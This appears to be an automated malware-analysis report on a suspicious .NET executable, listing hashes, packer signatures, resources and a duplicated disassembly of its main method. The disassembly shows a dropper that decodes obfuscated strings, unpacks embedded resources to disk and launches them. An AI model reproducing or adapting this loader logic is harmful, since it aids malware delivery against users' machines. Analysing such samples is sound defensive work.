Suspicious
Suspect

e1c3b51e85583197055cc32270a110e1

PE Executable
|
MD5: e1c3b51e85583197055cc32270a110e1
|
Size: 4.53 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
e1c3b51e85583197055cc32270a110e1
Sha1
22b77310e703ab819ac1ffd2335a93e8116b3319
Sha256
c34af1f1f238747d6839ce6857138e97d722443c4e2a794c072c236228ceaa07
Sha384
bf423a298cfc8ed143eb74de5d6a94acdb700d142f4712c67e56f09c10e3919e61fdb077e0dc0a2365ae03696dc437d9
Sha512
4374dcd71c9fa6271e5a92c45d24f17331d2543cb03a6966a0a9e59848f30d62210e22e37ffb1b2c4f55817a8ee3ff362808550e98ebdbe1c0387a030a3e2f7c
SSDeep
98304:zK70czp1bzpQ3cVmKdezCrH/0suAAjnswHtRt1tJSHo0:mNbzp2cjOCWAIswHtRt1tJB
TLSH
4C26337C86B8C56DC9270EFBC7F996BFC6017939D146E207A85BAE9636170940843F8C

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
e1c3b51e85583197055cc32270a110e1
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
tlasiyixfmcjtnjp.Resources
qapmmjakrvxjcpva
weebbzlqyletkngt
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

����������
Full Name

����������
EntryPoint

System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>()
Scope Name

����������
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

service
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

16
Main Method

System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>()
Main IL Instruction Count

166
Main IL

nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr aHIyOTJ1WkpCdFJia1BoL0tueWRZM1hNS3Q4UXJ5MTNPeUFRYVpNOEVZRitEWHkrTWNGazdpS3FoUzFsbTUrREpzUFdIWEVKS29KbXRpWEhqUC8xNlhOVXUzRytEVzczRVdieGk2N095YjA0ckx5SUtTdGt2K2NVaFJtTXRxVUtCejFYMnB2YnNvdUpSeUxQeXBYMjBOQ05LU2g0R2MwUHFCdkNFTDlqQzJxWWo1Z3lsam8zUXY1dGZGR282ak9HeTEwSmFNcmVSUUFOWDlxM1kraDlYYU1mOVZya0FudzQxaEJVYXBDMzlrcGVEeWdaQ1prKzhIOHY2YU91MHVKZ3RLcTdkRTM1MTJDd1V0aG1pT0gvaGJ2cEp1WlZVbFVtMU0zcWc0M3RDQkVIVG1xUmRhaS8zeHFDS21RRTM1WnlhQmRPaVlRcnFoazB1WW93YllMV0U3UTd0bG9oUnBwdmFWNDFRemJZV3V4THFmc0RxWllxTURQQlIzZlFFQjgvNm5qZDgybGRTcDU4Q282ZDJYOUZnQT09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr bDh0MTFzSzVpZFhkaEQ1c1l3WXdrZz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGFVVld5djNkbDdqWkVmejgva25hUT09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr d2VlYmJ6bHF5bGV0a25ndA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr bDh0MTFzSzVpZFhkaEQ1c1l3WXdrZz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr eDdmbUlnZThmZngxcDBaTU9mNjNDQT09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr cWFwbW1qYWtydnhqY3B2YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr dGxhc2l5aXhmbWNqdG5qcA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br IL_01D6: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr VXBHQzFmYzlZeTNMVHNFNlhRRXlrRTdnd0VJM2REaGViU1Z1SmptczZzTT0= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_016D: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br IL_0172: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_01D2: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt IL_0135: ldloc.0 ret <null>
Module Name

����������
Full Name

����������
EntryPoint

System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>()
Scope Name

����������
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

service
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

16
Main Method

System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>()
Main IL Instruction Count

166
Main IL

nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr aHIyOTJ1WkpCdFJia1BoL0tueWRZM1hNS3Q4UXJ5MTNPeUFRYVpNOEVZRitEWHkrTWNGazdpS3FoUzFsbTUrREpzUFdIWEVKS29KbXRpWEhqUC8xNlhOVXUzRytEVzczRVdieGk2N095YjA0ckx5SUtTdGt2K2NVaFJtTXRxVUtCejFYMnB2YnNvdUpSeUxQeXBYMjBOQ05LU2g0R2MwUHFCdkNFTDlqQzJxWWo1Z3lsam8zUXY1dGZGR282ak9HeTEwSmFNcmVSUUFOWDlxM1kraDlYYU1mOVZya0FudzQxaEJVYXBDMzlrcGVEeWdaQ1prKzhIOHY2YU91MHVKZ3RLcTdkRTM1MTJDd1V0aG1pT0gvaGJ2cEp1WlZVbFVtMU0zcWc0M3RDQkVIVG1xUmRhaS8zeHFDS21RRTM1WnlhQmRPaVlRcnFoazB1WW93YllMV0U3UTd0bG9oUnBwdmFWNDFRemJZV3V4THFmc0RxWllxTURQQlIzZlFFQjgvNm5qZDgybGRTcDU4Q282ZDJYOUZnQT09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.Void lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr bDh0MTFzSzVpZFhkaEQ1c1l3WXdrZz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGFVVld5djNkbDdqWkVmejgva25hUT09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr d2VlYmJ6bHF5bGV0a25ndA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr bDh0MTFzSzVpZFhkaEQ1c1l3WXdrZz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr eDdmbUlnZThmZngxcDBaTU9mNjNDQT09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr cWFwbW1qYWtydnhqY3B2YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr dGxhc2l5aXhmbWNqdG5qcA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br IL_01D6: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr VXBHQzFmYzlZeTNMVHNFNlhRRXlrRTdnd0VJM2REaGViU1Z1SmptczZzTT0= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_016D: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br IL_0172: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr NGpZcGJEby9qdGVkSmp6VndXQ2Fndz09 call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String lhswqpnylvpvfmrhbcbmqerl.<lhswqpnylvpvfmrhbcbmqerl>::<TheHellTower>(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_01D2: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt IL_0135: ldloc.0 ret <null>
e1c3b51e85583197055cc32270a110e1 (4.53 MB)
File Structure
e1c3b51e85583197055cc32270a110e1
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
tlasiyixfmcjtnjp.Resources
qapmmjakrvxjcpva
weebbzlqyletkngt
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙